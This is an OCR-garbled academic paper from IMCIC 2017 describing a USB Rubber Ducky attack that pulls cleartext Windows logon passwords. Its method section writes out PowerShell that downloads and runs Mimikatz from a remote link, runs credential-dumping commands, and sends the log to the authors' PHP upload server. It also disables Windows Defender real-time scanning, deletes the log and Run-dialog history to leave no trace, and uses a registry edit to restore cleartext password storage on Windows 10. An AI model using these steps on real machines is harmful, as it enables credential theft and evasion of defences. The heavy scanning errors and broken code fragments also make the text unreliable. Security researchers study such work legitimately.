Proceedings of The th International Mul-Conference om Complesty, Informatics and Cybernetics (IMCIC 2017 Hacking Experiment Using USB Rubber Ducky Scripting Benjamin Cannoles Department of CSIS University of North Georgia Dahlonega, GA 30005, USA ‘[email protected] and ‘Ahmad Ghafarian Department of CSIS University of North Georgi Dahlonega, GA 30005, USA [email protected] ABSTRACT By leaving your computer unlocked while you are away for seconds can give hackers all the time they need to oblain your personal information ftom your computer. This paper aims to ‘etal the necessary research and development of a USB Rubber Ducky script and its implementation to obtain clear text logon id and passwords from a Windows machine, in mere seco ach stage is laid out discussing applications of Ducky script, powershell, mimikatz, and re-enabling the vulnerability. Details fof the attack on Windows 7 operating systems and higher will be presented, Keywords: USB Rubber Ducky, hacking, scripting, powershel, rmimikatz, and duck tool ki. 1. INTRODUCTION Nearly every computer, including desktops, laptops, tablets and Smartphone take input from humans via’ keyboards, This is possible because there isa specification with every ubiquitous USB standard known as Human Interface Device (HID). Practically, this means that any USE device claiming to be @ keyboard HID will be automatically detected and accepted by ‘mast modem operating systems including Windows, Mac OS, Linux or Android. ‘The USB interfice is generally a dangerous vector for attack. Ia any organizations, use of USB fash drives is restricted [1] due to their potential for being used as a hacking tool or malware delivery. Examples of USB storage usages to serve as ‘ malwate delivery mechanism ate provided in various research papers including (3, 7, 8, 9]. Recently an even more insidious form of USB-based attack has emerged known as BagUSB (2, 5]. The BadUSB device registers as multiple deviee types, allowing the device to take covert actions on the host machine For example, a USB flash drive could register itself as @ device ‘or a keyboard, enabling the ability o inject malicious scripts This functionality is present in the Rubber Ducky penetration testing tool [4 Unfortunately, because USB device firmware cannot be scanned by the host machine, antivirus software cannot detect or defend against this attack. According to the authors in (10) this problem is not just limited to suspect flash drives. Any B device that communicates over USB is susceptible to this kind of attack. Moreover, existing USB security solutions, such as white listing individual devices by their serial number, are nol adequate when considering malicious firmware that can make spurious claims about its identity during device enumeration, Standard USB devices are 100 simplistic to reliably authenticate. Similarly, secure devices with signed firmware ‘that could permit autheaticaton ar rae, leaving it unclear how to defend ourselves against this new attack, ‘One can employ various approaches to penetrate a machine as a hacker or @ penetration tester such as social engineering, ‘exploiting vulnerabilities ofthe system, ete. One ofthe practical stratogies used by the hackers is to plug in 2 USB stick to a ‘machine. This can be dane by using a USB dovice detected by @ ‘victim's computer as a HID (this is called BadUSB) and running, the code without the knowledge oF consent of the victim, For ‘example, if the user is away for lunch and left his or her ‘computer unattended, the hacker can plug in the USB in the ‘victim's machine for malicious purposes Several atempts have been made by researchers to mitigate the dangers of hacking to a machine via BadUSB. One of such ‘methods is provided by Vouteva [14]. The author provided a proof of concept forthe feasibility and deployment of BadUSB by using an Arduino Miero [15] as a replacement for a BadUSB, In this paper, we present the details of our approach in implementing the penetration into a Windows machine via USB Rubber Ducky and scripting. The mechanism allows a hacker to attack an unaltended machine and retrieve sensitive information such as user identification and clear text password fom the victim machine. We will utilize several tools and technologies such as powershell, mimikatz, scripting language, web server and Ducky toolkit NG. ‘The rest ofthis paper is organized as follows. In stetion 2 we review the literature, Section 3 covers keylogger enabled USB and other hacking mechanisms related to USB. The tools and technologies used in tis research are deseribed in section 4, Section 5 details the implementation of our atack method. The usin appears in section 7Proceedings of The 8th International Mul-Conference on Complexity, Informatics and Cybernetic IMCIC 2017) 2, LITERATURE REVIEW In this section we explain some ofthe previous research in bot the areas of using USB as an attack veetor and the mechanisms for preventing attacks related to USBs, At Black Hat 2015, Nohl and Lell presented USB. attack scenarios using a BedUSB [11]. The authors demonstrated that itis possible to use a USB to redirect the users DNS quetes to an attackers DNS server. Ina related work Kamkar [12] has shown a Teensy USB microcontroller, configured to install @ backdoor and change the DNS seitings of an unlocked machine. Recently, snother method of using a BadUSB has oes developed by Nikhil Mital (SamratAshok) in a tool called Kastilye [13]. The tool has functionality like information gathering and script executions which leads to hacking the victim machine. With the aim of mitigating the risks posed by USBs, the authors in [16] built a BodUSB device and tested it in a controlled OS caviroamest. Based on the resulls of ther tests, they made recommendations on how to congo the security of a machine In another published research paper the authors exploited several USB features fo establish a rogue IITTP channel used t0 Teak data stored on the device's disk to an Internet back end un: To mitigate the dangers of using keylogger enabled USB, the authors in [18] built @ method called USBWall withthe sim of preventing an attack, The authors compared their USBWall with other commercislly available antivirus products. In their controlled environment, they. report that USBWall is anti-virus software, 3. USB KEYLOGGING Keylogger software has the capability to recond every keystroke ‘user makes toa log file, It ean record information such as user ig, password, instant messages, and email. Detail of Keyloggers performance and whether they need administrative access to the target machine or not are discussed in [19]. In recent years there has been some hardware development that enhances the task of keylogging. In this section we deseribe the specification of one of that hardware that we use in this research, ‘The USB Rubber Ducky tis been developed by Haks [4]. This USB key includes a 60MHz programmable microcontroller and an SD slot. It behaves like & keyboard and it looks like USB flash drives. It ean be easily hidden on a computer's device port. Auother feature of this device is that it may be hidden in fhe task manager it is assumed that its power consumption may be revealed by physical measurements. However, t0 use the USB Rubber Ducky we need physical access to the vietim’s ‘machine and we need to write a malware to be injected into the device ‘Computers inherently trust devices that claim to be 8 HID. It's through these devices that humans interact with and accomplish their daily tasks on all computers including desktops, laptops, tablets, and smart phones. The USB Rubber Ducky is © keyboard emulator disguised within a USB thumb drive case. It has boon used by IT professionals, penetration testers and hackers since 2010 and has become the most widely used 4 ‘commercial keystroke injection attack platform in the business, ‘Combined with its sriptng language, malware payloads ean be ‘written and deployed, “Many people leave their computers natended, even if only for ‘few minutes, These few minutes is all it takes for personal information t0 be stolen from the victim's machine by a ‘malicious hacker using the USB Rubber Ducky or a similar device. Whether itis a local account or a Microsoft account, ‘vulnerability exists in Windows and many other operating systems. Clear text passwords are stored in the computer's ‘main memory that can be extracted using a program called Mimikatz designed by Benjamin Delpy [22]. One of the many functionality included in mimikate is the sekuzlsa function, ‘which specifically targets logon passwords and hashes. “This research exploits Windows vulnerability utilizing the USB Rubber Ducky. In this project the machine has windows ‘defender for its wntvirus. An account is created onthe victim's ‘machine and al activities are targeting this account. Inthe next section we describe the details of the tools and technology needed to consirucl the malware payload and for launching an attack, 4, TOOLS ANd TECHNOLOGIES ‘This section outlines the tools and technologies we used in this research project 4.1 Victim's Machine For the vietim machine we use © physical machine running Windows 7, 64-bits Ultimate Eaton with all patches applied and having windows defender a the antivirus software 42 USB Ducky Hardware ‘We used @ USB Rubber Ducky for attack media (HakS [4D this looks like a USB. fash drive which can be plugged ito the ‘victim's machine. The average USB Rubber Ducky includes a {60MHtz programmable microcontroller and a SD slot. Some of the features ofthis device include behaving like a keyboard; it ‘does not show in the task manager and its power consumption ‘may be revealed by physical measurements, 4.3 Seripting Language To write malware payload we use Rubber Ducky scripting language. Writing scripts can be done from any common text ‘editor such as Notepad. Each command must be writen on a nnow line all in caps, and may have options follow. The ‘commands ean invoke keystrokes, key-combos or strings of text as well as offering delays or pauses. The two most common ‘commands are DELAY and STRING, DELAY is followed by 44 number that represents milliseconds. For example, the line “DELAY 2000" instructs the Rubber Ducky to wait 2 full seconds before proceeding to the next line of code. This is ‘extremely important in making sure the seript runs smoothly land effectively. Since the Ducky is extremely fast, some ‘computers may not be able to keep up. This command prohibits the Ducky to move faster than the computer will be able to follow. The STRING command instructs Rubber o process the text following STRING. It can accept a single or multiple characters, Also, the command WINDOWS (or GUI) emulates the Windows-Key. Figure 1 shows an example of e script [5] ‘which displays Hello World! Iam in your PC.Proceedings of The th International Mul-Conference on Complesty, Informatics and Cybernetics (IMCIC 2017) REM wy First Payload WINDOWS. DELAY 100 STRING notepad.exe ENTER DELAY 200 STRING HeTlo World! I'm in your PC! _ Figure 1- An example of Rubber Seript 44 Duck Toolkit NG The Duck Toolkit NG is an open souree penetration testing platfonm that allows users to generate USB Rubber Ducky (23) payloads for use on Windows, Linux, Mac OSX and many ather popular operating systems. The Duck Toolkit NG allows us t9 use pre built payloads, ereate our own payloads and decade existing payloads. Using. the toolkits require administrative access, powershell, and internet access, 45 Powershell Powershell is an object-oriented programming language and interactive command line shell’ for Microsoft Windows. Powershell automates system tasks, such as batch processing, and create systems management tools for iy implemented processes. Figure 2 shows an example of powershell for downloading a file from a website and then executing it[6 LAY 100 NG powershell (new-object Iient) .DownloadFile (‘het Start-Process "STEMPS\bob.exe" Figure 2-Example ofa powershell code 4. Web Server Since we are going to execute the malware remotely from the web, we need a web server with PHP capability to upload and download malware executable files 4.7 Mimikatz “Mimikatz [22] is an open-source utility that enables the viewing ‘of credential information from the Windows LSASS (Local Security Authority Subsystem Service) through its. sckurlsa module which includes plaintext passwords and Kerberos tickets and uch more. Most antivirus tools will detect the presence of Mimikatz as a threat and delete it, but itis possible to go around that, Mimikatz can be executed both locally from the command line and remotely. To run Mimikatz from the command line, we need mimikatzexe and sekurlsa.dll on the target machine. This approach is not desirable im this research because we want to be able to use the USB Rubber Ducky and bypass hard drive. To run it remotely, fist we need fo establish 6B «connection to the servers, then copy over sekurlsa dll and run it. Mimikatz tools run on all versions of Windows from XP forward. However, its functionality is somewhat limited in Windows 10. Below is an example of Mimikatz statements that need to be executed in order to look for passwords on a system, privilege: debug 5, HACKING EXPERIMETN ‘This section details the process of exploiting Windows ‘vulnerability by creating an attack payload for retrieving userid and password from the victim's machine, For this project, the victim machine will be running Windows 7 with windows defender as its antivirus 45.1 Using Ducky Script to Create Payload ‘We used Ducky scripting, which was introduced in section 4.3 and wrote our own malware script in a notepad and saved it as a text file. This text file was then encoded into an inject. bin file. ‘The Following statement converis the sript text fie (9 bin file. java cxt = ‘Once we created the injetbin file, we injected it onto the ‘microSD card which was then inserted in the USB. Rubber Ducky hardware, At this point the Ducky is ready for the fist part ofthe attack, 5.2 Configuring Mimikatz for Kile Upload/Download ‘The next step is to obtain a copy of the Mimikatz executable and upload to a hosting service of your choosing, or your own private webserver. For this project we chose a Google Drive account to upload the executable file. When the file was uploaded we utilized a direct link generator to obtain the ‘download link forthe mikimatz as this is how it will download and run ffom powershell. Uploading the credentials were alittle more in-depth, We created a PHP (Figure 3) page on our ‘website to listen to the lle coming in, and then seve it. This receives the file and saves it in the cutent ditectory of the PHP. file, with the name of “credentials VictimIPAddress CurrentDa temimikatz.leg”. <2pnp Suploadbir ‘credentials’ .”_".§_SERVER| *REMOTE_A DD!) ."_" date (*Fon-d Hains"); fuploadrie = $UploadDire.basename (S_FILES(*£L1e"] (name! 1) Figure 3- PHP file for uploading files the server 5.3 Required Powershell Seript ‘After the download and upload locations were set, we needed to figure out the powershell scripting required. When the Rubber Ducky is plugged in, we have to get powershell open and running with administrator privileges. For that we must open the run menu with Ducky commands and use this statement:Proceedings of The th International Mul-Conference on Complesty, Informatics and Cybernetics IMCIC 2017) Powershell start-process erd-verb-runAs ‘See Figure 4 below for the eomplete powershell script (New-ob ject Net.WebCl ent) .UptoadPile ("attp://sp.canno Les.con/up.php' , ‘mimikatz.1og") del /£ minikatz,log "Remove-Item2roperty ~Path "HKCU: \Software\Microsoft\Windows\Current exsion\Explorer\RusMRU" -Nane "*" = ExrorAction Silentlycontinue” Figure 4- Powershell sript Now we have the privileges to continue with our script effectively. However, before we begin downloading and running programs, we frst mst deal with the antivirus. In this scenario, through alittle previous reconnaissance, we know the victim's’ machine is running only windows defender. The following code will deactivate defenders real ime scanning. Set-bpPreference-DiableRealt ineMonitoring ‘We deactivated the defender in the beginning and then changed the variable Strue to Sfalse, to reenable it when we are done, as to leave no trace ‘The Invoke-Expression directive, the New-Objcct emeélet, and the Downloadtile/UploadFile methods are needed for the next pan, IEX, or Invoke-Expression, is used in powershell to execute rather than echo everything that follows it back in the ‘command line. This is ericial to getting our application to run after we download it, The New-Onject emdlet opens an jnstance of Microsoft NET framework, When combined with the WebClient class, i allows sending and rocciving to web servers, The DownloadFile and UploadFile allow us to specify ‘where and what gets received and sent. The code in Figure $ uses the Invoke-Expression to download the Minmikate executable and run it TEX (New-object System.Net .WebClient) .DownloadFile (*h: JTazive. google. com/uetexpozt downloads Be Natg5UKUS_znVebFdoUVAzVz9", \"Senv:temp\nin ikazz.exe\"); Start-Process \"Senv: temp\mimikatz.exe\" Ps Figure 5-Code for Downloading Mimikatz and exceuting After Mimikatz has run, it logs the results in an output file, to act it uploaded the WebClient class must be utilized again as shown below, with the web address given, pointing to the PHP file Histening for the upload (Wew-object Net.WebCiient) .UploadFile (*http://sp Les.con/up.php', mimikatz.log" [Everything writen in the emd prompt docs not get saved and will be erased upon closing il. Unfortunately, the same does not apply to the Mimikatztog file and the command that was ‘written inthe run dialog box. These can be quickly erased with two commands. First, we will use the following to delete the Jog file of eredentials 16 del /£ mimikate.log ‘Then we needed to clear out the run menu in case our vietim ever goes to check it, This ean be done utilizing the following code. “Renove-TtemProperty ~Path VEKCU: \Software\Microsoft\Windows\CurrentY orsion\Explorer\Runiau" -Name '** = tion si lentlyContinu ‘This command will delete the history from the windows registry. We are calling it 0 delete “*" from the RunMRU path. The “ExrorAction SilentlyContinue" command is a failsafe to ensure the command will continue to execute and ignore it, should an ero should arise. ‘5.4 Mimikatz Support Commands ‘Afler we run Mimikatz but before we wpload our results via powershell, we must execute few commands to obtain the ‘redentials we want, -Mimikaty will open in a new prompt ‘window which wil allow us to continue passing the STRING. ‘command through the Ducky 0 output commands. These ‘commands are sprivilege: :debug” and sekurlsaz:logonpasswords” {Log will erate the Jog file in the default location, and prompt “Mimikatzto record everyting outputted. “privilegesdebug” is necessary to give Mimikatz the permissions it needs to pall credentials from memory. Lastly, *sekurlsa-logonpasswords” calls the sekurisa function in Mimikatz. Once itis completed later the DELAY has passed, we will instruct the Ducky to key “ALT F4” closing the Mimikatz window and returning us tothe powershell prompt, [At this stage the powershell has been written, files are ready for download and upload, and mimikatz commands are set. Next ‘we encode the code into an injectbin fle, and place the ‘MicroSD inside the Rubber Ducky. Once it is plugged into a ‘machine, it will automatically un and vietim’s login eredential and password are retrieved in cleartext. The result of execution ‘of the malware is shown in Figure 6 below.Proceedings of The th International Mul-Conference on Complesty, Informatics and Cybernetics (IMCIC 2017) Using ‘minikatz.Jog’ for logfile + of sinikatz« privilege: :dug Privilege “8” oc nila @ slursa:logmpasseords ftertication 1d: 6 104752 (2opaoeeon0Fe5He) sassion Ineractive fete 2 User time: test topin server: (ull) logan Tine: 12/3/46 5:27:63 OH [eeu Priary vsernane : testumyesoshotai com ‘amin: nicrosoftecout ms Tesesoncecedoeneatenune ofS * sua beTeaTieotcaesboemstadeecetocbn9 tse digest Usernane testueyaseotmai co * oumain + nicrsoftecount paced Damm herbs Username testumyt5efhotnai com * oimain =: Nicrosoftecout * passnond + (rl) sp creinan + Figure 6- Screenshot shows id and password 55. Attacks on Windows 10 Machine As cam be seen Figure 6, the —usemame testdummy8S85@hotmailcom and password Dummydummy have been retrieved in eler-iext, After Windows 7, Microsoft changed the way that their ‘operating system handled passwords, This vulnerability is not easily exploitable on Windows 10 without a registry edit. Due to the unique platform of atack, since we have physical access to the system, we can make @ registry edit and allow this vulnerability tobe exploited again, ‘Because the way Windows registry works, performing this ll in fone attack is very difficult, Therefore, on Windows 0, this atack must be spit nto two pasts In the fist part we have to edit the Windows Registry to enable the vulnerability in Windows 10 and make it susceptible to the second part, which isthe attack we have already ereated. Once we make the registry edit, the Windows account must be locked, signed out, or restarted before the registry changes go into effect. We utilized the “reg add” command to recreate the reistry value that Microsoft has removed, and setting its value oT" forse, Once we add this value and the account is logged into once again, logon passwords will be stored in memory. The Ducky script for this partis quite similar but shorter than the previous script, We ran powershell as an administrator again, then performed the proper registry edit, and then launched te stack similar to the one we did before. Similar to Windows 7, we ‘were able to retrieve the user's credentials from the memory. n 6, CONCLUSIONS In this paper we demonstrated the process of writing & malware payload which can exploit Windows vulnerability to launch an attack on a victim's machine. The payload can be executed from the victim's machine or remotely, Our aim inthis project was to launch the attack remotely targeting 2 Windows 7 machine, To create the malware and launch the attack, we utilized various tools, such a USB Rubber Ducky, scripting language, powersehll, mimikatz, Ducky toolkit NG and a web server For Windows 10 machine, we had to take an extra step of ‘editing the registry to create the vulnerability that existed in Windows 7. However, in both cases of Windows 7 and 1D the ‘malware was injected into a USB Rubber Ducky deviee, the device was attached to the victin’s machine, and the payload ‘was executed remotely. As a result, we were able to retrieve the ‘victim's use id and password from the memory of the vietim's ‘computer, 17. FUTURE RESEARCH, ‘This project ean be extended 1 several ways: 1) instead of running remotely, one ean run the payload locally. 2) More analysis of main memory and locking for more information. 3) More experiment with Windows 10 and looking for other ‘possible implementations rather than editing the registry 8, REFERENCES [1] M. At-Zarouni, The Realty of Risks from Consented Use fof USB Devices. School of Computer and Information Science, Edith Cowan University, Perth, Westen ‘Australia, 2006, [2] A Caudill and B. Wilson. Phison 2251-08 (2303) Custom Firmware & Existing Firmware Patches (BadUSB), Gills, 26, Sept. 2014, BB] N. Falliere, LO. Murehu, and E. Chien W32. Stuxnet Dossier. 2011 [4] Haké. “Episode 709: USB Rubber Ducky Pat 1 Intp.hakS orgepisodes'episode-709, 2013. [5] Mais. USB Rubber Ducky -nups:/github,convhakSdarsen/UUSB-Rubber Ducky/wikiPaylosds, 2013, [6] K. Nobl and J. Lel, BadUSB— On Accessories That Tum Evil. In Blackhat USA, Aug. 2014 I7] OLEA Kiosks, Inc, Malware Scrubbing Cyber Security Kiosk. hup/www.olea.comyproducteyber-security-kiosk’, 2018. [8} 8. Shin and G. Gu. Conficker and Beyond: A Large-scale Empirical Study. In Proceedings of the 26th Annual Computer Security Applications Conference, ACSAC "0, [9] J. Walter. "Flame Attacks": Briefing and Indicators of ‘Compromise. McAfee Labs Report, May 2012. [10] D. Tian, A. Bates and K. Butler; Defending Against Malicious USB Firmware with Goodl/SB. ACSAC ‘15, December 07-11, 2015, Los Angeles, CA, USA. [11] BlaekHiat USA" 2014, Karsten Nobl ‘and Jakob Lell, BadUSB On Accessories that’ Turn Evil, Inups:/srlabs defbadusbi, Accessed on 07 Jan 2015 [12] S. Kamkar, USBDsiveBy, htp:samy plusbdriveby/, Jan 2015 [13] Nikhil "SamatAshok” Mittal, Katya, ‘nups:/github.convsamratashokKauily, Fan 2015 PayloadProceedings of The 8th International Mul-Conference on Complexity, Informatics and Cybernetic IMCIC 2017) [14] S. Vouteva, Feasibility and Deployment of Bad USB. University "of Amsterdam, System and Network Engineering Master Research Project, Feb 2015, [15) Arduino Micro, hip:arduino.ee/en! Main/ArduinoBoardMicro, 2015 [16) RBhakte, P. Zavarsky and S. Butakov. Security Controls for Monitored Use of USB Devices Hased on the NIST Risk Management Framework, Computer Software and Applications Conference (COMPSAC), 2016 IEEE 40:h ‘Annual, [I7)R. Schilling and F. Steinmetz. USB Device Phoning Home. Hamburg University of Technology, February 2016 [18] M. Kang. USBWall: A Novel Security Mechanism wo Protect Against Malciously Reprogrammed USB Devices. ‘MS., Computer Science, University of Kansas, 2015. [19] G. Fourier, P. Matousswoski and P. Cotret. Hit the Keylack: stealing data from your daily device incognito, CS.CR, France, Oct. 2016, [20] KeyScrambler, hps:/www.qfksohwate.com! [21] KeyGrabber, Ipviwww Keelog.comusb_hardware_ keylogger html [22] Mimikatz,hups:/ithub.comgentiThiwi/mimika [23] Hall, 1," & Breen, K, (2014), Duck Toolkit NG, Inipssduektoolkit.com 8